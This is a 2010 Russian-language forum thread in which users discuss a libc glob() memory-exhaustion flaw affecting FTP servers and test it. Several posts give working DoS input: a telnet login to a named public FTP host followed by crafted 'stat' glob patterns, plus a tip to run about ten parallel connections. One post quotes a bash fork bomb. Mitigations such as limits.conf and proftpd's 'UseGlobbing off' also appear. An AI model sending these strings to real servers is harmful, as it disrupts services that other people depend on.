URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 11324
[ Назад ]
Исходное сообщение
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено opennews , 07-Окт-10 17:56
Ошибка в реализации функции glob() в различных Си-библиотеках, например в glibc и BSD libc (http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-...), может быть использована удалённым атакующим, чтобы нарушить работу FTP/SFTP серверов. В связи с тем, что на многих серверах разрешён анонимный вход, ошибку легко эксплуатировать и многие программные продукты являются уязвимыми. В отчёте (http://securityreason.com/securityalert/7822) утверждается, что серверы даже таких крупных компаний, как Adobe и HP, подвержены этой проблеме.
Проблема возникла из-за того, что переменная GLOB_LIMIT, которую добавили в 2001 году для ограничения объёма памяти функцией glob() c целью защиты от аналогичной уязвимости (http://www.opennet.ru/base/netsoft/1007055482_116.txt.html), не эффективна. Проверка на совпадение (globbing) вызывает функцию glob(), чтобы сравнить список файлов с шаблоном и вернуть на выход список совпадающих файлов. В виду того, что GLOB_LIMIT не действует в сит...
URL: http://securityreason.com/securityalert/7822
Новость: http://www.opennet.ru/opennews/art.shtml?num=28210
Содержание
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,anonymus, 17:56 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 17:56 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 18:45 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,анонимус, 18:04 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,EuPhobos, 18:43 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 20:50 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,АдминистыйБородач, 21:46 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,БородатыйОдмин, 21:44 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,EuPhobos, 21:51 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,User294, 22:26 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,pavlinux, 00:46 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,AdVv, 16:15 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,User294, 17:44 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,maxkit, 18:36 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 18:41 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,fakedream, 16:14 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,luzerz, 18:53 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 19:21 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,ноним, 19:53 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 21:48 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 07:52 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,MrClon, 10:02 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 18:54 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 19:18 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,oops, 23:42 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,pimiento, 07:01 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Stax, 19:01 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,XoRe, 21:59 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Dmitriy.trt, 19:21 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Sylvia, 19:55 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 20:17 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 20:38 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 20:48 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 20:51 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Иван Иванович Иванов, 21:39 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,prapor, 02:48 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 07:57 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,oops, 09:04 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,тигар, 10:18 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,anonymous, 20:40 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 20:49 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 09:01 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Doc_x800, 11:43 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 20:23 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,zazik, 09:41 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 19:26 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 07:59 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,ананим, 19:57 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,XoRe, 22:05 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 20:32 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,diceman, 21:14 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 08:00 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 18:02 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,QuAzI, 09:51 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,evgeny_t, 22:58 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,PereresusNeVlezaetBuggy, 23:06 , 07-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,V, 00:30 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,PereresusNeVlezaetBuggy, 00:34 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,PereresusNeVlezaetBuggy, 09:42 , 09-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,r9ft, 06:52 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,User294, 17:41 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,i, 09:04 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,phantom lord, 09:14 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Аноним, 09:15 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,QuAzI, 10:36 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,sysnet.by, 14:18 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,zazik, 14:25 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,MrClon, 14:31 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,zazik, 14:37 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 19:17 , 08-Окт-10
- Ошибка в библиотЕке libc привела к уязвимости большинства FTP,аноним, 21:54 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,zazik, 10:35 , 11-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,Nas_tradamus, 15:30 , 08-Окт-10
- 'прокатываемость' зависит от параметра,аноним, 17:43 , 08-Окт-10
- 'прокатываемость' зависит от параметра,Nas_tradamus, 18:17 , 08-Окт-10
- 'прокатываемость' зависит от параметра,аноним, 19:07 , 08-Окт-10
- 'прокатываемость' зависит от параметра,аноним, 19:11 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 21:47 , 08-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,V, 00:02 , 09-Окт-10
- Ошибка в библиотке libc привела к уязвимости большинства FTP...,аноним, 00:08 , 10-Окт-10
Сообщения в этом обсуждении
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено anonymus , 07-Окт-10 17:56
Закроют, чай не мелокомягкие
Ну и в серьезных проектах совсем без ошибок не бывает, как это не печально.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 17:56
vsftpd не использует, ни glob(), ни fnmatch().
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 18:45
> vsftpd не использует, ни glob(), ни fnmatch().Спасибо! А то я уже полез апдейты смотреть :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено анонимус , 07-Окт-10 18:04
У меня на сервачке uClibc. Можно спать спокойно?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено EuPhobos , 07-Окт-10 18:43
> У меня на сервачке uClibc. Можно спать спокойно?А можно IP вашего сервачка?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:50
192.168.1.13 =)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено АдминистыйБородач , 07-Окт-10 21:46
Эй, откуда ты узнал секретный адрес моего банковского терминала?!
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено БородатыйОдмин , 07-Окт-10 21:44
Легко! 10.11.12.13
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено EuPhobos , 07-Окт-10 21:51
> Легко! 10.11.12.13За натом в основном всегда можно спать спокойно, но кайфа от НАТ-а никакого )
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 07-Окт-10 22:26
> А можно IP вашего сервачка?127.0.0.1
Удачного взлома! :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено pavlinux , 08-Окт-10 00:46
>> А можно IP вашего сервачка?
>127.0.0.1
>Удачного взлома! :)Вроде не тинэйджер... :/
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено AdVv , 08-Окт-10 16:15
>>> А можно IP вашего сервачка?
>>127.0.0.1
>>Удачного взлома! :)
> Вроде не тинэйджер... :/Физический возраст не всегда соответствует умственному развитию :(
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 08-Окт-10 17:44
> Вроде не тинэйджер... :/Да просто локальный DoS как-то особо не получился. А я то уж понадеялся OOM киллером отхватить :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено maxkit , 07-Окт-10 18:36
> серверы даже таких крупных компаний, как AdobeПереживут. Весь мир на дырявом Flash'е сидит.
Но новость, конечно, неприятная.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 18:41
vsftpd подтверждает своё название
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено fakedream , 08-Окт-10 16:14
Еще бы он пофункциональнее был чуть ..
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено luzerz , 07-Окт-10 18:53
эксплоит то где?)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 19:21
> эксплоит то где?)$ telnet ftp.microsoft.com 21
user anonymous
pass opennet
stat */../*/../*/../*/../*
stat */../*/../*/../*/../*test
и весь эксплоит
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено ноним , 07-Окт-10 19:53
т.е. на локальной фс stat */../*/../*/../*/../* тоже сработает ?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 21:48
Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал дожидаться, пока память кончится, и прибил.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:52
> Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал
> дожидаться, пока память кончится, и прибил.забавно, в csh, на fb8:
# stat */../*/../*/../*/../*
/usr/sbin/stat: Argument list too long.
proftpd-1.3.2b:
stat */../*/../*/../*/../*/../*
211-Status of */../*/../*/../*/../*/../*:
End of status
211 Out of memory during globbing of */../*/../*/../*/../*/../*
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено MrClon , 08-Окт-10 10:02
220 ProFTPD 1.3.2d Server (MrClon Server) [192.168.10.1]
user anonymous
331 Anonymous login ok, send your complete email address as your password
pass evil_hucker
230 Anonymous access granted, restrictions apply
stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test: Forbidden command argumentЧто я делаю не так? Может «експлоит» кривой?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 18:54
че-то по-моему этот баг только в bsd и есть. ProFTPd выдает банальный:
211 Out of memory during globbing of */../....
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 19:18
У меня на фре 8.1 так же. А на линуксе proftpd упал.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено oops , 07-Окт-10 23:42
freebsd 8.1 amd64 + pure-ftpd - все ок, ничего не падает.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено pimiento , 08-Окт-10 07:01
gentoo i686, pure-ftpd не упало
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Stax , 07-Окт-10 19:01
Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris, системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено XoRe , 08-Окт-10 21:59
> Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что
> наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку
> исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris,
> системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.Скажите, а вы правда не знаете, что такое glibc?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Dmitriy.trt , 07-Окт-10 19:21
В Debian используется eglibc. Возможно, там просто нет этой проблемы.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Sylvia , 07-Окт-10 19:55
eglibc - набор патчей над glibc
если уж в bsd libc есть ошибка, то в форке от glibc и подавно
интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:17
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленникамиКонечно, баш, например:
ls */../*/../*/../*/../*
эффект будет примерно эквивалентный
-(){ -&-;};-
в смысле, сожрет всю память и повесит машину, если не настроены правильные лимиты
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:38
$ ls */../*/../*/../*/../*
bash: /bin/ls: Слишком длинный список аргументов
$
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:48
> bash: /bin/ls: Слишком длинный список аргументовА так?
echo /*/*/../*/../*/../*/../*
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:51
> А так?
> echo /*/*/../*/../*/../*/../*По сабжевой статье там должен быть несуществующий файл, то есть:
echo /*/*/../*/../*/../*/../*fake
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Иван Иванович Иванов , 07-Окт-10 21:39
bash: Killed out of memoryКлёво :) Local DOS :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено prapor , 08-Окт-10 02:48
А на ZSH не сработало. Проц жрёт и всё. Память не меняется.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:57
> А на ZSH не сработало. Проц жрёт и всё. Память не меняется.В csh тоже тупо одно ядро съедет и все, правда еще пришлось через -9 убивать
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено oops , 08-Окт-10 09:04
а у меня на csh по-тихоньку память жрало
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено тигар , 08-Окт-10 10:18
сколько ждал?
я минут 5, память не жрало, только, как написали выше проц, 1 ядро. head, i386, 3 недельной давности
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено anonymous , 07-Окт-10 20:40
где можно статейку прочитать про настройку этих димитов?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:49
> где можно статейку прочитать про настройку этих димитов?man limits.conf
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 09:01
>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
> Конечно, баш, например:
> ls */../*/../*/../*/../*
> эффект будет примерно эквивалентный
> -(){ -&-;};-
> в смысле, сожрет всю память и повесит машину, если не настроены правильные
> лимитыНа Debian начало отъедать память, пришлось килять
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Doc_x800 , 08-Окт-10 11:43
>>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
>> Конечно, баш, например:
>> ls */../*/../*/../*/../*
>> эффект будет примерно эквивалентный
>> -(){ -&-;};-
>> в смысле, сожрет всю память и повесит машину, если не настроены правильные
>> лимиты
> На Debian начало отъедать память, пришлось килятьOpenSUSE 11.3
Linux Doc 2.6.31.5-0.1-default #1 SMP 2009-10-26 15:49:03 +0100 i686 i686 i386 GNU/Linux
та же ситуация
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:23
> и насколько это может быть использовано злоумышленникамиможет быть использовано для подвешивания собственной машины :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 09:41
> eglibc - набор патчей над glibc
> если уж в bsd libc есть ошибка, то в форке от glibc
> и подавно
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы
> ? и насколько это может быть использовано злоумышленникамиЧерез php/perl/etc можно сделать а-ля exec('glob ...').
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 19:26
пока что имеем уязвимость не в большинстве фтп серверов, а только в proftpd
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:59
> пока что имеем уязвимость не в большинстве фтп серверов, а только в
> proftpdproftpd-1.3.2b под freebsd: 211 Out of memory during globbing of /*/*/../*/../*/../*/../*fake
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено ананим , 07-Окт-10 19:57
несправедливо мс исключена из упоминания:
>Affected Vendors (not verified):
>- - Apple
>- - Microsoft Interix
>- - HP
>- - more more more.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено XoRe , 08-Окт-10 22:05
> несправедливо мс исключена из упоминания:
>>Affected Vendors (not verified):
>>- - Apple
>>- - Microsoft Interix
>>- - HP
>>- - more more morenot verified
P.S.
На генте х64 bash с такой строкой жрет проц, но память жрет только до 158 метров.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:32
Vsftpd проблеме не подвержен. Ну очень радует)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено diceman , 07-Окт-10 21:14
на фре proftpd выдал листинг файла с правами, владельцами и прочим
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 08:00
> на фре proftpd выдал листинг файла с правами, владельцами и прочимсделай команду подлинее, получишь: 211 Out of memory during globbing
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 18:02
> сделай команду подлинее, получишь: 211 Out of memory during globbingЕсли "Out of memory" - это еще хорошо. Это значит что ошибка была корректно обработана. А если оно подвиснет на несколько минут - то это дос.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено QuAzI , 08-Окт-10 09:51
Как? Как ты это сделал, демон?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено evgeny_t , 07-Окт-10 22:58
stat */../*/../*/../*/../*
bash: /usr/bin/stat: Argument list too long
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 07-Окт-10 23:06
Ключевой diff: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c....Кривой он какой-то... и сделан аж три месяца назад. Приплыли, товарищи.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено V , 08-Окт-10 00:30
что-то не получается у меня повесить proftpd под openbsd
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 08-Окт-10 00:34
> что-то не получается у меня повесить proftpd под openbsdВидимо, корректно обрабатываются ситуации с нехваткой памяти.
Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку, и начало постепенно отдавать память взад.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 09-Окт-10 09:42
>> что-то не получается у меня повесить proftpd под openbsd
> Видимо, корректно обрабатываются ситуации с нехваткой памяти.
> Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку,
> и начало постепенно отдавать память взад.Фикс для OpenBSD таки закоммичен: http://marc.info/?l=openbsd-cvs&m=128657455002435&w=2
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено r9ft , 08-Окт-10 06:52
Ubuntu:stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test : Forbidden command argument
в bash echo /*/*/../*/../*/../*/../*test - начинает сжирать память
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 08-Окт-10 17:41
На 64-битной при попытке сделать stat на такую строку - баш съедает гига полтора и минут 5 тупит. После чего сообщает Argument list too long. Работает сугубо под рутом и только если сменить текущую диру на /. В общем у меня полноценного локального DoS особо не получилось, только возможность скушать прилично ресурсов на несколько минут.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено i , 08-Окт-10 09:04
pureftpd в gentoo не падает, bash память жрет... но лимиты спасают.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено phantom lord , 08-Окт-10 09:14
Отлично, как раз юзаю Vsftpd :-)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 09:15
в макоси bash память жрет тоже и умирает
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено QuAzI , 08-Окт-10 10:36
Забавно.
proftpd-1.3.2b - бага не проявилась.
proftpd-1.3.3a_1 - бага проявилась.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено sysnet.by , 08-Окт-10 14:18
SLES 11.0
ProFTPD 1.3.2b Server - )))))))) только корректное сообщение о "дебильной" команде 220 ProFTPD 1.3.2b Server (FTP Skif) [10.34.0.114]
331 Password required for spectre
Password:
230 User spectre logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls */../*/../*/../*/../*/../*
229 Entering Extended Passive Mode (|||7126|)
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of */../*/../*/../*/../*/../*
226 Transfer complete
ftp>
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 14:25
У меня bash уперся в 3 гига и так и остался висеть.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено MrClon , 08-Окт-10 14:31
Какая ОС, версия libc, bash ну и так далее?
На своём debian сервере и бубунтовых рабочих станциях так и не смог воспроизвести баг :(
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 14:37
> Какая ОС, версия libc, bash ну и так далее?
> На своём debian сервере и бубунтовых рабочих станциях так и не смог
> воспроизвести баг :(OpenSUSE(как релиз посмотреть - не знаю, это не удобнейшая фря), libc-2.11.1,
GNU bash, version 3.2.51(1)-release (x86_64-suse-linux-gnu)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 19:17
> OpenSUSE(как релиз посмотреть - не знаюВроде, везде работает:
cat /etc/*release*
"Ошибка в библиотЕке libc привела к уязвимости большинства FTP"
Отправлено аноним , 08-Окт-10 21:54
> Вроде, везде работает:
> cat /etc/*release*Точно
cat /etc/*/../*/../*/../*/../*release
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 11-Окт-10 10:35
>> OpenSUSE(как релиз посмотреть - не знаю
> Вроде, везде работает:
> cat /etc/*release*# cat /etc/SuSE-release
SUSE Linux Enterprise Server 11 (x86_64)
VERSION = 11
PATCHLEVEL = 1
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Nas_tradamus , 08-Окт-10 15:30
На Pure не прокатило, слава зайцам.
"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 17:43
> На Pure не прокатило, слава зайцам.С какими параметрами не прокатило? Там подходящий путь зависит от приложения и количества подкаталогов. У меня на proftpd команда:
stat */../*/../*/../*/../*/../*
выдает 211 Out of memory during globbing of ...
но команда:
stat */../*/../*/../*/../*
подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных соединенях - и DoS готов.
И, да, дополнительно надо проверять:
stat */../*/../*/../*/../*testtest
это должно почти не требовать памяти, но подвесит точно так же.
PS: блин, вроде не лор же, а такие простые замечания приходится делать...
"'прокатываемость' зависит от параметра"
Отправлено Nas_tradamus , 08-Окт-10 18:17
>[оверквотинг удален]
> stat */../*/../*/../*/../*/../*
> выдает 211 Out of memory during globbing of ...
> но команда:
> stat */../*/../*/../*/../*
> подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных
> соединенях - и DoS готов.
> И, да, дополнительно надо проверять:
> stat */../*/../*/../*/../*testtest
> это должно почти не требовать памяти, но подвесит точно так же.
> PS: блин, вроде не лор же, а такие простые замечания приходится делать...Да блин, я все понимаю. В Pure-FTPD вообще не работают никакие комбинации.
ftp> stat */../*/../*/../*/../*/../*
Connected to ftp.site.ru.
No proxy connection.
Mode: stream; Type: binary; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off
ftp>
Игрался минут 5 с stat, ls и добавлением фэйкового файла в конце - не работает.
В ProFTPD работает, как и в bash. Но на моих серваках с ProFTPD нет левых людей и анонимусов.
"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 19:07
> ftp> stat */../*/../*/../*/../*/../*А через ftp оно и у меня не работало. Зато работало через telnet.
"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 19:11
> ftp> stat ...stat в ftp-клиенте имеет другое назначение. Это - не тот stat. :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 21:47
Решение для proftpd - вписать в proftpd.conf:
UseGlobbing offЗЫ: дежавю? http://bugs.proftpd.org/show_bug.cgi?id=1066
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено V , 09-Окт-10 00:02
2001-й год, 5 баллов! :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 10-Окт-10 00:08
того и гляди злобные анонимусы будут ходить по серверам и их "тестировать"... а может и робота-обходчика подрядят...